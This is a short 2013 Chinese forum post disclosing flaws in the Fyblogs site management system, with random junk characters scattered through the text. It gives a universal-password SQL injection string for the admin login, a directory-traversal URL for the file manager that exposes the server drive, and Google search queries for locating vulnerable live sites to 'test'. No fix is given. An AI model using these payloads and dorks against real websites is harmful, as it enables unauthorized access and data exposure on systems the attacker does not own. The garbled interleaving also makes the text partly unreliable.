漏洞类型: 未授权访问/权限绕过0 r: u5 R$ x' ?- d/ c8 o
5 C7 G) u2 ^7 O4 s% W" L; l
简要描述:
, ^/ _% m$ E% G; l# w& \7 d. A7 r) ]7 j9 g
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!& |& H1 {. I3 \0 E( K; G
0 s, \9 |! S3 P' T; N) d5 j. O详细说明:; j7 I) s' o! a+ t9 N9 G! O
3 b! A% \/ J# } ~3 Y7 Y
后台万能密码 'or'='or'
. B9 M& s7 E0 \: v$ B; l后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
- U6 l% B, S( ]5 L$ x! Kadmin/uploadfile.asp?currentFolder=/upfiles/../. }) G A6 ~' D; v, v
. j: X% A- ~1 W; e漏洞证明:- j7 |- Y# Q) o$ M. R8 j% X
$ T4 }: s, ^( K1 k0 t谷歌:inurl:type.asp?id=1 新闻中心
]5 S% H' ?$ f) K) | A或者 :inurl:download_ok.asp?# x) H" |6 h' K; N" m
6 g* J/ K1 |" F8 J n可以测试
& Q& J) O, i7 p9 e1 B, T, @8 ~8 ?8 `$ s* P% B8 Y
' S" C' e |+ \: M0 R
|
发表于 2013-3-7 13:07:46
收藏
支持
反对